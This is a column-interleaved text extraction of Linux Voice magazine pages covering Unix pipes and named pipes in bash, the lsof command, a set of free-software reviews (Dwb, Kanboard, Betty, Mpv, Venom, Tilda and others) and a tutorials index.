4 of the diagram in the code presented                  loop:                                                5. while (( $i < 10 ))
here; the reading and writing goes on in the            1. #!/bin/bash                                       6. do
child processes, which simply access their              2. # Piping the output of a loop                     7. echo $RANDOM
standard input or standard output streams.              3.                                                   8. (( i++ ))
They are not aware that these streams are
connected to a pipe.
                                                          Creating a pipe
   This code is so quintessentially UNIX
that I think all system programmers should
be required by law to re-write it annually to
remind themselves of the simplicity and                                     Stage 1                                               Stage 2
elegance of the original UNIX API. If you                                Parent Process                                       Parent Process
want to delve into this code in more detail,                                                                     p [1]                            p [0]
look at the man pages for fork(), exec() and                 p [1]                           p [0]
dup2().
   When created on the command line,                                                                             p [1] stdout               stdin p [0]
pipelines can only be connected in a linear
sequence. There is no way, for example, to                                                                     Upstream child            Downstream child
feed the output of two programs into the
input streams of a comparison program, or
to run a program that generates two parallel                                  Stage 3                                                 Stage 4
output streams and sends each down a
different pipe. These are really limitations                               Parent Process
                                                                                                                 write ( )                        read ( )
of the command line syntax; it is perfectly
possible to do both these things with pipes if
you’re willing to create and manipulate them
                                                                                                                 stdout                           stdout
in code.                                                      stdout                          stdin
                                                                                                                Upstream child            Downstream child
                                                             Upstream child          Downstream child
Pipes and loops
You can, of course, create and use pipes
within shell scripts. After all, a shell script is
                                                          A parent process creates a pipe and hands the file descriptors down to its children. Descriptors
basically just a bunch of shell commands
                                                          on the “unused” ends of the pipe are closed.
put into a file. What is less obvious is that
you can pipe into and out of loops within the



                                                                       www.linuxvoice.com                                                                    65
     CORETECHNOLOGY

                                                      At line 7 we accumulate a running total of              and a set of access permissions that work
  How big is a pipe?                                  the file sizes which we echo to standard                the same as for a regular file. You can
                                                      output on line 8. So the output of the loop is          experiment with named pipes using the “Try
  According to the man page, the capacity of
                                                      a steadily growing total of file sizes. At line 9,      it out: Named Pipes” box.
  a pipe (from kernel version 2.6.11 and up) is
  65,536 bytes. If a process attempts a write         the output from this loop is itself piped into             The important thing to note about named
  to a pipe that would take it over that limit,       tail to pick off just the last line – the total         pipes is that two unrelated processes
  the process will block until (hopefully) the        reported during the final iteration of the loop.        can establish communication provided
  downstream process has consumed some of                Of course, both of these examples are                they agree on the name of the pipe. (I will
  the data. However, there’s a lower limit of 4,096
                                                      more about shell scripting syntax than about            return to the issue of “agreeing on a name”
  bytes which is the maximum amount that is
  guaranteed to be written atomically – that is,      the underlying behaviour of the pipes.                  when I look at other forms of inter-process
  it will not be interleaved with data written by                                                             communication later in the series.)
  another process or thread that also has access      Named pipes
  to the pipe. However, scenarios where multiple      The pipes we’ve looked at so far do not                 Two pipes for two directions
  processes are simultaneously writing to the
                                                      have an entry in the filesystem. So they                Linux pipes, whether named or anonymous,
  same pipe are rare, and probably best avoided.
  And I don’t think there’s any way to sensibly co-   have no name (they’re sometimes called                  are unidirectional. You write to the upstream
  ordinate the scenario where multiple processes      anonymous pipes) and they have no owner                 end and read from the downstream end.
  are reading from the same pipe.                     or access permissions. So does that mean                   However, there’s nothing to stop you
      Pipes deliver a simple, unstructured byte       that any process can connect to them?                   using two pipes if you want two-way
  stream. If the upstream process writes 200
                                                      No. Anonymous pipes can only be used                    communication. Our final example this
  bytes to the pipe, then 300, then 50, the
  downstream process just sees 550 bytes in           between processes sharing a common                      month does exactly that. It uses a pair of
  the pipe. There is no concept of message            ancestor that created the pipe in the first             named pipes to establish communication
  boundaries.                                         place, and then passed the file descriptors             between a shell script and a “co-process”.
                                                      down to its children. There’s no way for                We are returning to our shell script example
                                                      some other unrelated process to jump in                 of piping a list of random numbers into sort,
9. done | sort -n                                     and obtain access to either end of the pipe.            but extending it so that the output of sort
   Lines 5–9 set up a loop, which we go               And it goes without saying (but I’ll say it             can be read back in to the script. It’s a little
around 10 times. Each time round, the                 anyway) that pipes cannot traverse the                  tricksy, so you may not want to tackle it
echo on line 7 emits a random number to               network. The communicating processes                    immediately after a heavy meal. Here’s the
standard output, so the output of the loop is         must be on the same machine.                            code:
a list of 10 random numbers. The exciting               There’s another type of pipe that                     1. #!/bin/bash
moment comes on line 9, where we redirect             does have an entry in the filesystem.                   2. # Example of a “co-process”
the output of the loop as a whole into a              Appropriately they’re called named pipes,               3. # using two named pipes
pipe. The sort program on the downstream              also known as FIFOs (First In First Out). In            4.
end of the pipe does a numeric sort. So the           practice, these are much less common.                   5. mkfifo /tmp/pin /tmp/pout
output of the script is ten random numbers            You can search for them using the find                  6. sort -n < /tmp/pin > /tmp/pout &
in ascending order.                                   command. On my Ubuntu 12.04 system I                    7. exec 3> /tmp/pin 4< /tmp/pout
                                                      found only two:                                         8. # write 10 random numbers to pin
Piping into a loop                                      We can examine one of these entries:                  9. i=0
You can pipe into a loop as well. This                $ sudo ls -l /var/spool/postfix/public/qmgr             10. while (( $i < 10 ))
example tots up the sizes of the files in the         prw--w--w- 1 postfix postdrop 0 Apr 1 17:14 /var/       11. do
current directory:                                    spool/postfix/public/qmgr                               12. echo $RANDOM >& 3
1. #!/bin/bash                                         Notice the p in the first character position.          13. (( i++ ))
2. # Piping into and out of a loop                    Notice also that there’s an owner, a group,             14. done
3.
4. ls -l | awk ‘{print $5}’ |
                                                        The history of pipes
5. while read n
6. do                                                   The pipe is one of the most significant innovations   cp foo bar
7. (( total += n ))                                     that UNIX brought to the world. Writing in 1964       would be written as
8. echo $total                                          while he was working at Bell Labs, Doug McIlroy       foo cp bar
9. done | tail -1                                       wrote “We should have some ways of coupling           Extending this notation, McIlroy’s “garden hose”
                                                        programs like garden hose – screw in another          pipeline might be implemented like this
   The command on line 4 just extracts the
                                                        segment when it becomes necessary to massage          foo sort pr lpr
file sizes (field 5) reported by ls. The exciting       data in another way”. The idea took a while to        instead of the modern:
bit here is that we’re piping the output of this        catch on and the simple “infix” pipe notation         sort foo | pr | lpr
command into a loop. Within the loop (line 5)           that we take for granted nowadays took even              When pipes were eventually added into UNIX
we read the size into the variable n. The read          longer. In a retrospective paper written by Unix      they initially used the same operator (‘>’) as is
                                                        pioneer Dennis Ritchie in the Bell Labs Technical     used for redirecting output to a file, so the pipeline
command consumes data, line by line, from
                                                        Journal in 1984, he describes two earlier ideas       would be written as:
standard input -- that is, from the pipe. Each          for pipe syntax. The first was that the commands      sort foo > pr > lpr >
read consumes one line of data. It returns              themselves should be thought of as binary                But this notation “only lasted a couple of
“false” (and therefore terminates the loop)             operators, so that what we would now write as:        months” before being replaced by the current one.
when it reaches the end of its input stream.



66                                                                 www.linuxvoice.com
                                                                                                                     CORETECHNOLOGY


                                                  “If you made it through that without dying from
15. exec 3>&- # close descriptor 3
16. # now read them back from pout
17. while read var <& 4                           a surfeit of syntax, congratulations! You are now
                                                  officially a shell scripting guru.”
18. do
19. echo var got $var
20. done
21. # Don’t need those pipes any more             4 on the pout pipe. The loop at lines 9 to 14        Finally, line 22 disposes of the pipes.
22. rm /tmp/pin /tmp/pout                         generates 10 random numbers as before,                  Actually, Bash has a built-in command
  OK, here’s the scoop. Line 5 creates the        the difference being that they’re written to         called coproc, which sets up the pipes
named pipes. My choice of in and out              file descriptor 3 (the pin pipe). There are          and starts the background process
names are from the point of view of the           more magic runes at line 15 which closes             automatically. But the syntax is no less
external co-process; that is, /tmp/pin carries    the upstream end of pin. This is important           awkward than the example I’ve presented. If
data into the co-process and /tmp/pout            because the sort program needs to see                you’d like the details, search the Bash man
returns data from it. At line 6 we start a        “EOF” on its input when it has consumed              page for coprocess.
background process running sort (referred         all the data, and that won’t happen unless              If you made it through that without dying
to here as the “co-process”), it’s reading from   we’ve actually closed the upstream end.              from a surfeit of syntax, congratulations!
one named pipe and writing to the other.          Lines 17 to 20 set up a loop reading from            You’re officially a shell scripting guru. Next
Line 7 is definitely non-obvious! It opens file   pout (the results from sort); this is similar to     month I’ll look at another form of inter-
descriptor 3 on the pin pipe, and descriptor      the “Piping into a loop” code we saw earlier.        process communication: sockets.




Command of the month: lsof
Our featured command this month is lsof
(“list open files”). It’s one of those passive
“what’s going on” reporting tools that can be
so useful for trouble shooting. Basically, it
lists open files that match given selectors.
To start simple, we can list all the files that
are currently open by processes running as
a specified user:
# lsof -u syslog
...or we can ask “which processes have
these file open?” like this:
# lsof /var/log/*                                 lsof delivers a wealth of information on open files and active network endpoints.
  You can also ask the question the other
way round: which files does this process          You can use it to answer the question “is            # lsof -i udp -a -u ^root
have open? To do this you need to know the        the service actually listening on the port           which shows me all UDP sockets NOT
process ID:                                       it’s supposed to be listening on?” We could          owned by root. We can home in even further.
# pgrep nmbd                                      tighten up the query to ask “which process is        Here, we’re just asking for UDP sockets
1121                                              listening on the secure shell port?” like this:      bound to the mdns port (port 5353):
# lsof -p 1121                                    # lsof -i tcp:22                                     # lsof -i udp:mdns -a -u ^root
   Here, we’re asking what files the Samba        or equivalently you could ask:                         Normally, the output from lsof is quite
daemon nmbd has open. If you try this             # lsof -i tcp:ssh                                    verbose. However the -t option tells lsof
command (or something like it) you’ll               It gets more interesting when you                  to just display the PID of the matching
discover that lsof has a pretty liberal idea      start combining selectors. By default                process(es):
of what an “open file” means. It not only         the selectors are combined with the OR               # lsof -i udp:5353 -t
shows you the regular files (open on a file       operation. For example, the following                    By itself this perhaps isn’t too useful, but
descriptor) but also the current directory of a   command shows open files that are either             it’s intended to be used with a command
process, any shared libraries it has attached     UDP sockets, or are opened by processes              substitution, perhaps like this:
(there are probably quite a few), memory-         running as root:                                     # kill -9 $(lsof -i udp:5353 -t)
mapped files, pipes, and any TCP or UDP           $ sudo lsof -i udp -u root                           which will kill all processes listening on UDP
endpoints it has open.                              This is probably not very useful. But if we        port 5353.
   Talking of endpoints, we can see all the       add a -a option the logic changes to “AND”:             As you can see, the command line is
open TCP or UDP sockets like this:                $ sudo lsof -i udp -a -u root                        starting to look like a mini language in its
# lsof -i                                         which answers the more useful question               own right, a bit like the find command.
   I find this command really useful when         “show me the UDP sockets owned by root”.             Indeed, the man page for lsof runs to 2,700
troubleshooting an unresponsive service.          We can also say “NOT”, like this:                    lines; it’s a daunting read!



                                                                 www.linuxvoice.com                                                                   67
     FOSSPICKS




FOSSpicks                                                                                        Sparkling gems and new
                                                                                                 releases from the world of
                                                                                                 Free and Open Source Software

             Mike Saunders has spent a decade mining the internet for free
             software treasures. Here’s the result of his latest haul…
Keyboard-driven web browser


Dwb 20130503-gh2
A
          n important step in the          And these keybindings are largely
          journey of all Linux and      based on those of the mighty Vim
          Unix users is acceptance of   editor (see issue 3’s cover feature).
the keyboard as the supreme tool        For instance, the H/J/K/L keys
for commanding a computer. Sure,        (lowercase) scroll the page left,
a mouse or trackpad is essential        down, up and right respectively,
sometimes – when you’re editing         while Shift+H and Shift+L
pixels in an image, for example –       (uppercase) go back and forward in
but more often than not, it’s just a    your browsing history. Hit O to open
time waster. Learn the keyboard         a URL in the current tab, or Shift+O
shortcuts for your favourite            for a new tab. Shift+J and Shift+K
applications and you’ll work much       cycle through tabs.
faster, because you no longer have
to take your fingers away from the      Take the hint
home row to grab that clumsy            This is all well and good, and means    Dwb doesn’t have a newbie-friendly tutorial, sadly, but the manual
rodent thing.                           you can keep your fingers on the        page on the site lists all of the keybindings.
    But what about web browsers?        keyboard for longer when browsing,
Unless you’re a fan of Lynx or Links    but what about links? Surely you                                     Well, Dwb has an alternative
(in which case, kudos), you probably    need a pointing device to select one                                 method: hit F for “hints” and small
find it hard to imagine using a         of the myriad links on the page?                                     boxes appear above every link on
browser solely via the keyboard. But                                                                         the page. These boxes contain a
it’s possible, as Dwb shows. This is
a WebKit-based browser – so it
                                        “You’ll find yourself navigating                                     letter (or multiple letters if the page
                                                                                                             has many links), so you simply type
uses a modern HTML rendering            much more quickly than having to                                     the letter(s) to “click” on the link.
engine – but it has a strong focus
on good keybindings.
                                        shove a cursor around the screen.”                                      And guess what: it works
                                                                                                             surprisingly well. Not with every
                                                                                                             site, but if, like us, you spend most
                                                                                                             of your time on text-heavy sites
                                                                                                             such as Wikipedia, Reddit, Slashdot
                                                                                                             and co., you’ll find yourself
                                                                                                             navigating much more quickly than
                                                                                                             having to shove a mouse cursor
                                                                                                             around the screen.
                                                                                                                It’s unlikely that Dwb will replace
                                                                                                             your main browser for day-to-day
                                                                                                             usage, but for those times when
                                                                                                             you’re researching, coding or doing
                                                                                                             something else text-intensive, it’s
                                                                                                             fantastic and rewards you from
                                                                                                             learning the wealth of keybindings
                                                                                Here we’ve pressed F to
                                                                                enable hints – ie small      that control it.
                                                                                boxes that show the
                                                                                                              PROJECT WEBSITE
                                                                                letters we need to type       http://portix.bitbucket.org/dwb
                                                                                to visit a link.


68                                                           www.linuxvoice.com
                                                                                                                                                 FOSSPICKS


Process management tool


Kanboard 1.0.5
L
       ike us, you probably get                     whole the dependencies are quite
       infuriated by buzzword                       minimal – thankfully.
       overload. So it would’ve been                  Go into your web server
easy for us to overlook Kanboard,                   document root and grab the latest
an application that implements a                    version of Kanboard using:
Japanese “process management                        git clone https://github.com/fguillot/
and improvement method” called                      kanboard.git
Kanban – but no, we persevered.                       Make the data directory inside it
FOSSpicks is 90% blood, sweat and                   writable by the web server (eg
compilation errors, you see…                        chown www-data:www-data data
   Anyway, Kanban is actually                       on Debian/Ubuntu), then access
useful. Buzzwords aside, it gives a                 http://<hostname>/kanboard in
team a simplified overview of a                     your browser. Log in as user admin
                                                                                                   Go to http://demo.
project, with easy-to-identify tasks                with password admin, and you’re
                                                                                                   kanboard.net to try out
and deadlines, and focuses on rapid                 ready to set up a new project                  a pre-populated board        so for bug tracking you could have
delivery of results. It can be used for             (known as a “board”).                          and see what the             Reported, Confirmed, Fixing, etc.
software development, but it also                                                                  program is capable of.          Kanboard lets you set up
works for other projects involving                  Do the Kanban-Can                                                           different categories for tasks, with
multiple people and sub-tasks.                      As mentioned, a core principle of                                           corresponding colours, and you can
Essentially, it’s a streamlined time                the Kanban methodology is to                                                create different users to assign to
and process management tool that                    present information quickly and                                             tasks. An especially useful feature
encourages incremental changes                      easily. So by default, Kanboard                                             is Automatic Actions, which
and participation from everyone.                    boards have four columns: Backlog                                           reduces the amount of time you
   Kanboard is implemented as a                     (tasks that need to be done but                                             have to spend administering the
web-based app, ideal for throwing                   haven’t been assigned to anybody);                                          board. For instance, you can
onto an intranet server in a                        Ready (tasks that are being                                                 configure Kanboard so that when
business, but you could also run it                 assigned but not yet started); Work                                         you move a task to a specific
on a private host if you’re working                 In Progress; and Done. You can                                              column, it’s assigned to a certain
on a FOSS project with some other                   change these columns to fit your                                            user. This is great if you have one
people and want to use it to plan                   specific project more appropriately,                                        user in charge of QA, for example,
releases. To run it you’ll need a web                                                                                           and you want he or she to be
server (Apache and Nginx are
recommended), PHP 5.3.3 or newer,
                                                    “Kanboard is implemented as a                                               responsible for everything that
                                                                                                                                lands in the “Testing” column.
and the mbstring and pdo_sqlite                     web-based app, ideal for throwing
modules for PHP. As that suggests,
SQLite is used for storage, so on the
                                                    onto an intranet in a business.”                                              PROJECT WEBSITE
                                                                                                                                  www.kanboard.net




How it works: Creating a new task




  1 Add to column                                               2 Configure the task                                    3 Move the task
       Choose the column to which you want to add                    Enter a title and description (Markdown is               Now the task will appear in the specified
the task, and click the blue plus (+) character next to its   allowed). You can assign categories, colours and users   column. Awesomely, you can quickly drag-and-drop
name. Here we’ll add to the Backlog column.                   to tasks, and even set due dates.                        tasks into other columns as shown.



                                                                             www.linuxvoice.com                                                                           69
     FOSSPICKS


Siri-like natural communication tool


Betty 0.1.6
A
          long with flying cars and     right now, but it shouldn’t be hard to
          hoverboards, one of the       bolt on an open source speech
          things we were promised in    recognition program at some point.
the 1980s was perfect voice-            To get it (in your home directory):
recognition software. Never again       git clone https://github.com/pickhardt/
would we have to prod clumsy            betty
keyboards and shuffle mice around       alias betty=”~/betty/main.rb”
– no, we’d simply recline in our           Ruby is required for it to run. Now
executive office chairs and tell the    you can use betty followed by a
computer to do all the hard work.       string to interact with it. This just
  Of course, this hasn’t happened,      works for the current terminal
                                                                                  An example of some of
partially because of the vast           session, so put the alias line in your                                  something is (with the text taken
                                                                                  the commands Betty
variation in human accents and          ~/.bashrc (~ is your home directory)      understands. A full list is   from Wikipedia). It’s pretty rough
dialects, and also because in offices   to make it always available.              provided on the project’s     round the edges – but that’s to be
nobody wants to hear someone               Betty understands various              website                       expected given the low version
shouting “DELETE NEXT LINE” all         human-friendly versions of Unix                                         number. Nonetheless, with a bit of
day. The closest we have is Siri on     commands, so you can ask it to                                          polish, perhaps an attractive Qt/Gtk
Apple’s lockdown-crazy iGadgets,        extract files and do wordcounts as                                      GUI and integration with a speech
which works fairly well, but even       in the screenshot. It can also pull                                     recognition tool, we Linux users
then it’s still not perfect.            information from the web, providing                                     could have a decent Siri-like system
  Betty is a FOSS Siri-like program,    you do this command first:                                              without becoming slaves to Apple.
a digital assistant that tries to       betty turn web mode on
understand human language. It           Now you can ask about the                                                PROJECT WEBSITE
                                                                                                                 https://github.com/pickhardt/betty
uses the command line for input         weather in cities, or what


Linux desktop remote control


PRemoteDroid
L
        inux is a great media centre    (You’ll need Java installed for this to
        OS. Hook your computer up       work – try the default-jre package
        to your TV via an HDMI cable,   if you’re using Debian/Ubuntu/
install a good media player like        Mint.) This will start the server on
XBMC or VLC, and voilà: you can         your Linux box; you’ll also see a new
watch movies on the big screen.         green icon in your desktop’s
You could invest in a Wi-Fi/            notification area. Right-click to get
Bluetooth keyboard and touchpad         information on the server, such as
combo to control the Linux-             the IP address, port number and
powered media box, but if you           password (by default “azerty”).
                                                                                  Here’s our laptop
already have an Android phone or           Go to the Play Store on your                                            Go back, and you should now be
                                                                                  connected to a TV, and
tablet, PRemoteDroid is the             Android device and search for             PRemoteDroid telling us       able to move the mouse pointer on
simplest solution.                      PRemoteDroid. Install it, run it and...   how to connect to it from     your Linux desktop from your
   PRemote Droid works very well        you’ll get a blank screen. Hit the        our Android phone.            phone (there are three mouse
and takes almost no time to set up.     Menu button and then Connections.                                       buttons at the top). Not bad, eh? So
Go to http://code.google.com/p/         Tap Menu again followed by New,                                         you already have an instant remote
premotedroid/downloads and              enter the your server details, and                                      control from your couch, and you
download PRemoteDroid-Server.           tap the new connection.                                                 can also bring up a keyboard via the
zip into your home directory. Then                                                                              menu button. All you need now is a
open a terminal and enter:
unzip PRemoteDroid-Server.zip
                                        “PRemoteDroid works well and                                            fluffy white cat.

cd PRemoteDroid-Server                  takes almost no time to set up.”                                         PROJECT WEBSITE
                                                                                                                 http://code.google.com/p/premotedroid
java -jar PRemoteDroid-Server.jar



70                                                               www.linuxvoice.com
                                                                                                                             FOSSPICKS


Screen recorder


Byzanz
M
              aking a recording of your        Because Byzanz is a Gnome app
              screen is a great way to      (albeit driven from the command
              demonstrate something         line), it needs the GStreamer
to another Linux user, show off your        development headers installed
awesome terminal skills, or submit          when building it from source. After
an extra-detailed bug report. But           make install you’ll have two new
where do you start? There are               binaries: byzanz-record and
jillions of video codecs out there,         byzanz-playback. The latter doesn’t
and then you need to upload the             interest us here as it’s for fixing
video to YouTube, or try to host it         bugs, but the former generates a file
yourself… It gets complicated.              when you run it like so:
                                                                                    Animated GIFs have
     Byzanz makes life much simpler         byzanz-record myfile.gif
                                                                                    limited colours, as you    how you can record just a selected
by recording to animated GIFs. Yes,           With no other options, this           can see in the             area of the screen using the -x, -y,
this is a crusty old technology and         records the whole screen for 10         background here, but for   -w and -h options. Use -d followed
many people wish GIFs would just            seconds and dumps the results into      most apps they do a        by a number in seconds to alter the
go away and die, but they have the          myfile.gif. You probably won’t want     solid job.                 duration of the recording, and -c if
advantage that they work in nigh-on         to record the whole screen,                                        you want to include the cursor.
every web browser in existence,             however, so check out the manual                                      Byzanz isn’t the most newbie-
with no need for extra plugins,             page (man byzanz-record) to see                                    friendly recorder due to its many
extensions or codec packs. And                                                                                 command line options, but it doesn’t
while GIFs aren’t particularly                                                                                 take long to learn the basics.
efficient for long videos, for short        “For short ‘check this out’ screen
“check this out” screen recordings
they’re fine.
                                            recordings, GIFs are fine.”                                         PROJECT WEBSITE
                                                                                                                https://github.com/GNOME/byzanz




Media player



Mpv 0.3.10
D
        evelopers often get a lot of        remove cruft from the code, work
        flak when they fork a project,      better with modern hardware, and
        but sometimes it’s the only         be easier to use.
way forward. Look at what                     Mpv is available for most major
happened to XFree86: it was the             distros (see http://mpv.io/
dominant X Window System                    installation) along with Windows
implementation on Linux and open            and Mac OS X. We installed it on an
source Unix flavours, but due to a          Ubuntu 13.10 test box using the
variety of reasons issues, a bunch          PPA – this also has packages for
of hackers forked it and now we             14.04, the latest release. While Mpv
have the X.org server, which is             doesn’t have a graphical front-end
                                                                                    Mpv plays pretty much
faster, more reliable and requires          as such, it does include an                                        command line options, because if
                                                                                    anything, including our
less configuration. It was a huge           on-screen display to pause and          ancient RealPlayer-rips    you’ve tried to use MPlayer before
win for the community.                      navigate through a movie.               from VHS versions of       and delved into the manual page,
   Mpv is a similar project, in that it’s                                           1980s Jackie Chan films.   you might’ve come away with a
a fork of MPlayer, one of the               Simplified command line                                            headache. So options have been
best-known media players in the             To use it, just pass it a filename at                              renamed and some parameters
Free Software world. Mpv’s                  the command line: eg mpv myfile.                                   have been changed to be more
developers have ambitious goals             avi. A huge range of codecs are                                    typically Linux/Unix-like.
that they believed couldn’t be              supported, and it didn’t choke on
realised by continually patching the        anything we threw at it. One of the
                                                                                                                PROJECT WEBSITE
MPlayer codebase, so they’ve split          goals of Mpv is to make it more
                                                                                                                www.mpv.io
off with their own version. It aims to      user friendly by cleaning up the



                                                                   www.linuxvoice.com                                                             71
     FOSSPICKS


Secure communication tool


Venom 0.2.0
S
       o here we are, one year on        the dependencies and build
       from the initial Snowden          instructions on https://wiki.tox.im/
       revelations. We know that our     Venom, then grab the source code
governments are spying on us on a        from GitHub and compile it.
horrific scale, and it’s only getting       When you start Venom, you’ll
worse. Fortunately, there are plenty     almost certainly hit an immediate
of people out there who’ve learnt        hurdle: you have nobody to chat to!
from history and know that this sort     Very few non-technical people are
of obsessive surveillance from           using Tox at this stage, but if you
paranoid governments only ever           hop on to IRC (FreeNode) and join
ends in tears. One group of hackers      the #tox channel, you’ll find plenty
is working on Tox (www.tox.im), a        of people to join you for a chat and
                                                                                 Can you trust that your
platform that aims to provide a          give you their IDs. These are long                                  conversations, but you can change
                                                                                 messaging service isn’t
completely secure, NSA/GHCQ-             sequences of alphanumeric               being intercepted by the    that by clicking the Settings button
proof means to transmit instant          characters – so click the + button in   spooks? Use Venom and       at the bottom and enabling “Keep
messages and audio/video calls.          the bottom-left of Venom and paste      get your privacy back.      history”. There’s not much else to
   Tox itself refers to the service,     in the string to add the person.                                    see in the client just yet, but it’s a
protocol and library implementing           For extra security, Venom doesn’t                                very promising tool and hopefully
the messenger back-end; to use it,       store the history of your                                           one step in the fightback against
you need a front-end client such as                                                                          the surveillance madness.
Venom. This is written in Vala/GTK
and still early in development – like    “Venom is one step in the fightback
Tox itself – but it’s already usable
and looking pretty good. Check out
                                         against the surveillance madness.”                                   PROJECT WEBSITE
                                                                                                              https://github.com/naxuroqa/Venom




Pop-in terminal emulator


Tilda
L
        ast issue we looked at           – but that’s not very useful, as it
        terminal emulators in our        can interfere with other programs.
        group test, and although we      Via the preferences dialog and the
covered five of the most notable, LV     Key bindings tab however, you can
reader Ross Mounce alerted us to         change it to something else – so
another that’s worthy of a mention:      find a key that you hardly ever use.
Tilda. Whereas most terminals are        (If you need to bring up the
designed to be standalone windows        Preferences screen again in future,
that you place on your desktop,          right-click on the Tilde window.)
Tilda is a “pop-in” terminal that
jumps out of the corner of the           Pop-up shell
                                                                                 Tilda is a godsend if you
screen when you need it.                 And there you have it: press the key                                scrollback and various compatibility
                                                                                 don’t normally work in a
   So it doesn’t have a billion          you chose, and Tilda will zip out       terminal window, but you    options. By default Tilda is
features rammed in, but it’s perfect     from the top-left of the screen,        often open one up to        displayed in all workspaces of your
for those times when you need to         providing an instant shell via a        enter a few quick           desktop/WM, but that feature can
run a quick command or two, and          single tap. You’ll find it useful       commands.                   be disabled too. It all works really
you don’t want to start another          straight away, but it’s also fairly                                 neatly, and once you’ve been using
terminal to clutter up your desktop.     configurable. In the Preferences                                    it for a while and move to a desktop
The project’s website lists the          dialog, go to the Appearance tab                                    without it, you’ll really miss it…
required dependencies, and once          and you can determine how much
you’ve it compiled, run it with tilda.   screen space Tilda should use.
                                                                                                              PROJECT WEBSITE
   By default, Tilda is designed to         It’s also possible to choose from
                                                                                                              https://github.com/lanoxx/tilda
appear when you press the F1 key         several colour schemes and enable



72                                                            www.linuxvoice.com
                                                                                                                             FOSSPICKS


  FOSSPICKS Brain Relaxers
https://launchpad.net/pybik/
 Crazy skiing game


 Ski 6.8
 S
        kiing is fun, until you hit     trees. If things get tough, you can
        some trees. Or lose control     hit J to jump or T to teleport, but
        on ice. Or get killed by a      these are always risky manoeuvres
 yeti, or burnt by a fire demon, or a   – you’re never entirely sure how or
 nuclear missile blows up in your       where you’ll land.
 face. OK, so those latter
 scenarios are unlikely to happen       Keep warm
 in a normal trip to Tirol, but         If a yeti (depicted by a scary blue A
 they’re all possible in this sweetly   character) gets close to you and
 comical text-mode skiing game.         you’re running out of options, you
    Text-mode, did we just say?         can hit I to launch a nuclear
                                                                                The skiier (I) has slipped
 Well, yes, but ASCII art doesn’t       warhead and (hopefully) blast the                                    and run ./ski to play it. And while
                                                                                through some trees (Y)
 automatically make a game bad          beast to smithereens. Ski is            and is trying to avoid a     it’s not comparable to NetHack in
 (see NetHack, also in this issue).     turn-based, so you have time each       yeti (A). Go off one side    the “I’ll be playing this for years to
 In Ski you’re sliding backwards        move to make plans, but note that       of the screen and you        come” stakes, it’s surprisingly
 down a mountain (due to some           your character has momentum so          appear on the other.         good fun and, like all of the best
 complications with your                you can’t just change direction                                      text-mode games, you can play it
 footwear), so you can’t see what’s     willy-nilly.                                                         over SSH. Who needs fancy X/
 coming up. Using the L and R              Because Ski is written in Python                                  Wayland/Mir anyway?
 keys to turn left and right, your      and has almost zero dependencies,
 goal is to survive for as long as      you can just extract the archive, use                                 PROJECT WEBSITE
                                                                                                              www.catb.org/~esr/ski/ski.html
 possible, avoiding killer yetis and    the cd command to move inside it




 Role-playing game



 Waste’s Edge 0.3
 Y
           ou might not have heard      attractive and text-packed
           of Waste’s Edge before,      introduction sets the scene: you’re
           but if you’ve been using     on the road and arrive at a remote
 Linux for a while and have kept        trading post. There you find that
 one eye on the gaming scene,           your mistress has been accused of
 you might have heard of                a theft, so you set to work trying to
 Adonthell. This is a role-playing      discover the full story.
 game engine – that is, a
 framework for building RPGs. It        Verbose action
 has been in development since          And the whole game is text heavy,
 1999, which reflects in its            with non-player characters
                                                                                The text is blocky and
 graphical style, and Waste’s Edge      providing extensive descriptions of                                  classic 16-bit RPGs, and we wish
                                                                                occasionally hard to
 is a small demo that shows off         events. You’re not just an observer     read, but some of the        that the text were easier to read.
 some of its features.                  though; you can choose from             other graphics are well      But despite the fact that it’s a
    It’s available in the stock         different responses, which affect       done.                        demo, Waste’s Edge is great fun
 repositories for X/K/L/Ubuntu,         the type of information you receive.                                 to explore, and we can’t wait to
 Debian, Fedora and other distros,         Waste’s Edge has superb                                           see what’s in store.
 or you can compile it from source      classical-style music that generates
 (you’ll need the tarballs for both     a fitting atmosphere for the                                          PROJECT WEBSITE
 Adonthell and Waste’s Edge).           surroundings. Graphically it’s old                                    http://adonthell.nongnu.org/index.
                                                                                                              shtml
 When you start the game, an            school and reminiscent of the




                                                             www.linuxvoice.com                                                                    73
     SUBSCRIBE



                    YOUR AD
                   HERE
            Email andrew@linuxvoice.com to advertise here

                   LISTEN TO THE PODCAST



                    WWW.LINUXVOICE.COM




72                           www.linuxvoice.com
                                                                                                                             TUTORIALS INTRO




                                               TUTORIALS
                                               Dip your toe into a pool full of Linux knowledge with nine
                                               tutorials lovingly crafted to expand your Linux consciousness


                                                In this issue…
                                                   76                                      78                                   82




Ben Everard
is working on an open source solution to hay
fever. He’s not optimistic.

                                                Benchmarking                           Pibrella                              Migration

W
                                                It can be a tricky business             Les Pounder explores the             Lots of offices use Windows
              hen I first started writing
                                                to establish just how fast              different ways you can               and could benefit from a
              about technology, I assumed
                                                a computer is. Ben Everard              use the Pibrella to let your         little Linux. Mark Delahay
              that there was a finite
                                                show various ways to test               Raspberry Pi interact with           guides you through the
number of things that you could write
                                                your computer’s speed.                  the real world.                      process of jumping ship.
tutorials on, and sooner or later these
would have to be repeated out of
necessity. While we will, no doubt,                86                                    90                                   94
revisit some topics from time to time
because things have changed, or we
want to approach them from a different
angle, I’ve actually found that the more
time I spend working on tutorials, the
more interesting things I find I can do.
The only limit is the amount of time we
have to write them.
                                                 Compiling                             BASIC                                 PyParted
    I wonder if this is a legacy of UNIX.        Compiling is at the heart of          For decades this was the              Valentine Sinitsyn doesn’t
The operating system was designed to             free software. Mike                   language of choice for                use fancy partition
allow users to combine tools in a                Saunders shows how to                 beginners. Juliet Kemp                managers, he just opens
myriad of ways using pipes. We still use         convert code into                     takes a peek back in time to          up a Python session and
these, but we also have a whole new              executable programs that              see where it came from and            codes. You can learn how to
bunch of tools in our arsenal for                can run on any computer.              how it worked.                        do this too.
connecting bits of software together.
It’s this ability to connect everything
together in different ways that makes           PROGRAMMING
Linux so powerful, and provides such
fertile ground for new projects.                Python                                 PageRank                              Android
    If you need proof, just shift your eyes      100 Should you use Python 2 or         104 Algorithms rule the world.       106    In part two of this series on
a little to the right. There’s everything              Python 3? That’s the                   For years, this one selected          programming with Android
                                                question everyone’s asking. After      what we read on the internet. It      Studio, our Beloved Leader
from school projects using the
                                                a slow start, the newer version is     transformed its inventors into        Graham Morrison gives his RSS
Raspberry Pi to how Google works with           starting to gain some ground. In       some of the richest men in on         reader application a makeover,
a bit of retro delight and some Linux           this tutorial, Richy Delaney takes a   earth, and yet it can be              and in the process, shows you how
